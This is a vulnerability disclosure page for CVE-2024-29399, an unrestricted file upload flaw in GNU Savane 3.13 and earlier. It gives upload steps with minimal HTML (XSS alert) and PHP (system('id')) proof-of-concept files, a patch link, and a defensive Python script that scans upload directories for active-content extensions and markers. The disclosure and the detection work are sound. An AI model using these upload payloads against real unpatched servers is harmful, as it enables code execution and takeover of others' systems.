CVE-2024-29399 PoC — GNU Savane Security Vulnerability

Source
Associated Vulnerability
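Title: GNU Savane Security Vulnerability (CVE-2024-29399)
Description: GNU Savane is a collaborative software development management system from the GNU community in the United States. GNU Savane v.3.13 and earlier contain a security vulnerability that allows a remote attacker to execute arbitrary code and escalate privileges via a crafted file.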
Description
CVE-2024-29399 reference
Readme
# CVE-2024-29399 Vulnerability Details

## Overview

In Savane v3.13 and prior, a lack of validation on uploaded files can allow for privilege escalation. Web servers configured according to the installation instructions are vulnerable to Cross-Site Scripting (XSS). In misconfigured web servers this can lead to Remote Code Execution (RCE).

**CWE Classification:** CWE-434: Unrestricted Upload of File with Dangerous Type

**Reported By:** Ally Petitt 

**Affected Product**: Savane

**Affected Versions**: 3.13 and prior

## Validation Steps
1. Visit /register/upload.php in the browser.
2. Upload a malicious file. This can be, but is not limited to, an HTML or PHP file depending on the webserver configuration (see Overview). Examples of either are shown below:

**PoC.html**
```
<script>
  alert("XSS");
</script>
```

**PoC.php**
```
<?php
  echo system("id");
?>
```


3. Visit the displayed link to the uploaded file to trigger code execution.


## Mitigation

Upgrade to Savane version 3.14 or higher. The patch can be found [here](https://git.savannah.nongnu.org/cgit/administration/savane.git/commit/?h=i18n&id=8a91ee8aae2599931d8b1c9a97ae4922b0c95c85).
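
Files uploaded before the upgrade may still be on disk. The following audit script is an added example, not part of the original README or of Savane's code: it flags files in an upload directory whose extension or leading bytes would make a web server execute them or a browser render them as active content. The extension list, the content markers and the sample files are assumptions constructed for illustration; the real upload directory is deployment-specific and is passed in as `root`.

```python
import tempfile
from pathlib import Path

# Assumption: extensions a web server may execute or a browser may render as active content.
ACTIVE_EXTENSIONS = {".php", ".phtml", ".phar", ".html", ".htm", ".xhtml", ".shtml", ".svg"}
# Assumption: byte markers of server-side or browser-executed content (matched lower-cased).
ACTIVE_MARKERS = (b"<?php", b"<?=", b"<script", b"<html", b"<svg", b"<iframe")


def classify_upload(path, sniff_bytes=4096):
    """Return the reasons a file is risky; an empty list means no finding."""
    reasons = []
    # Check every dot-separated part, so an inner extension ("x.php.txt") is also reported.
    parts = {"." + p for p in path.name.lower().split(".")[1:]}
    hit = sorted(parts & ACTIVE_EXTENSIONS)
    if hit:
        reasons.append("extension:" + ",".join(hit))
    with path.open("rb") as fh:
        head = fh.read(sniff_bytes).lower()
    reasons += ["content:" + m.decode() for m in ACTIVE_MARKERS if m in head]
    return reasons


def audit_upload_dir(root):
    """Map each risky file (path relative to root) to its list of reasons."""
    findings = {}
    for path in sorted(p for p in Path(root).rglob("*") if p.is_file()):
        reasons = classify_upload(path)
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings


def demo():
    with tempfile.TemporaryDirectory() as root:
        samples = {  # constructed sample uploads; the first two mirror the README's PoC files
            "PoC.html": b'<script>\n  alert("XSS");\n</script>\n',
            "PoC.php": b'<?php\n  echo system("id");\n?>\n',
            "notes.txt": b"release notes\n",
            "logo.png": b"\x89PNG\r\n\x1a\n<?php /* embedded */ ?>",
        }
        for name, data in samples.items():
            Path(root, name).write_bytes(data)
        return audit_upload_dir(root)


if __name__ == "__main__":
    for rel, reasons in demo().items():
        print(rel, reasons)
```
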